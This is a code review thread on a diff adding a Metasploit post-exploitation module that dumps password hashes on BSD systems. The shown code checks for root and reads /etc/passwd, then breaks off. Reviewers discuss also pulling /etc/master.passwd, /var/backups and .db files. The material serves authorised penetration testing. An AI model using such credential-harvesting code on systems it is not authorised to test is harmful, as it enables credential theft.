modules/post/bsd/gather/hashdump.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/hashes/identify'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super( update_info( info,
+      'Name'          => 'BSD Dump Password Hashes',
+      'Description'   => %q{ Post module to dump the password hashes for all users on a BSD system. },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['bcoles'],
+      'Platform'      => ['linux'],
+      'SessionTypes'  => ['shell', 'meterpreter']
+    ))
+  end
+
+  def run
+    unless is_root?
+      fail_with Failure::NoAccess, 'You must run this module as root!'
+    end
+
+    passwd = read_file('/etc/passwd').to_s
```

Comment:
IIRC, you can opt to pull in the backups from `/var/backups`. Or, if the text files are gone, you could pull in the `.db` files and optionally parse those. Depends on the BSD. For most scenarios, I think `/etc/passwd` and `/etc/master.passwd` are sufficient.

Reply:
> Depends on the BSD.

#WontFix

Reply:
Seems it's the same across FreeBSD, OpenBSD, and NetBSD, FWIW.

Reply:
It took 8 years to update the Linux hashdump module with support for `/etc/security/opasswd` password history.

Once this module has landed, I'll circle back in 8 years and review support for `/var/backups` on BSD.